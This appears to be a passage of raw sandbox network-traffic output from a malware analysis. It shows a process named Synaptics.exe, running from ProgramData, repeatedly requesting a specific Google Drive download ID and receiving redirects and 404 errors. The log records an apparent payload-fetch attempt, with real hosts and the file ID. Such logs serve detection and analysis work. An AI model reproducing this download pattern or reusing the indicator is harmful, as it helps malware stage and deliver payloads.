                                                                                                              Data Ascii: t Found)!!1</title><style nonce="kwSpfq97byMV-L59td4sWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              125192.168.2.449915142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-dpSD5JPz25fliiMZUKuhRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              126192.168.2.449916142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:31 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5kOVb6EiQlqtJQDYGI0ZmvdSbNulljCgX2ZpsbiuSwJMMTy-vMpfLsrD5Hzn8xqVq2NHTkjeE
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:31 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-2vVI3D0txNiowbpljG4p6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:31 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:31 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 34 6b 32 65 2d 48 74 4f 33 41 77 44 52 67 6a 77 65 76 4c 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="34k2e-HtO3AwDRgjwevLJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:31 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              127192.168.2.449917142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-izJl37RrWgjVE6QzbFsxxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              128192.168.2.449918142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:31 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5OGUATBHgrtDcHSnYYu6lCvyUGhv2fCV21VFJ_jizsWf9ECfgEuTekPiiDXLPZBHpVs9jr4KE
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:31 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-feFVvzDZNrhSDYsxHwz6nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:31 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:31 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 6e 7a 72 73 61 4f 72 79 72 35 77 55 63 36 32 50 71 39 34 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="VnzrsaOryr5wUc62Pq94Ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:31 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              129192.168.2.449921142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              130192.168.2.449925142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CHzheNQkrxze134GkDt2gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              131192.168.2.449926142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JoZAYCrrtODD6vaneAg3Dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              132192.168.2.449929142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:33 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mE5i4ImuhD-_9AcHxbFR5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              133192.168.2.449928142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4EzsRKrBu9FhKt6J3CUuMh9W5cow9zHzfUe2dRlTHUuR0aqMykNB-nVo3iScPTbDHA
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:33 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-5Sp1dFGG0iWXwbcPEsMLAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
